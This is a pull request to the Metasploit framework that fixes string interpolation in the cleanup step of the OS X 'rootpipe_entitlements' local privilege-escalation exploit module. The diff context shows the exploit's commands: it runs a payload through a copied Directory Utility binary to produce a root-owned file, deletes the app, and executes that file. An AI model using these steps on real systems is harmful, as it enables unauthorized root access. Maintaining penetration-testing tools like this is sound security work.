### PR TITLE
OSX rootpipe_entitlements - Fix cleanup

### DIFF
--- a/modules/exploits/osx/local/rootpipe_entitlements.rb
+++ b/modules/exploits/osx/local/rootpipe_entitlements.rb
@@ -75,7 +75,7 @@ class MetasploitModule < Msf::Exploit::Local
     cmd_exec("/bin/sh -c 'PAYLOAD_IN="+payload_file+" PAYLOAD_OUT="+root_file+" #{new_app}/Contents/MacOS/Directory\\ Utility'")
 
     print_status("Deleting Directory Utility.app")
-    cmd_exec('rm -Rf "#{new_app}"')
+    cmd_exec("rm -Rf '#{new_app}'")
 
     print_status('Executing payload...')
     cmd_exec("/bin/sh -c '#{root_file} &'")


### PR DESCRIPTION
Cleanup requires string interpolation
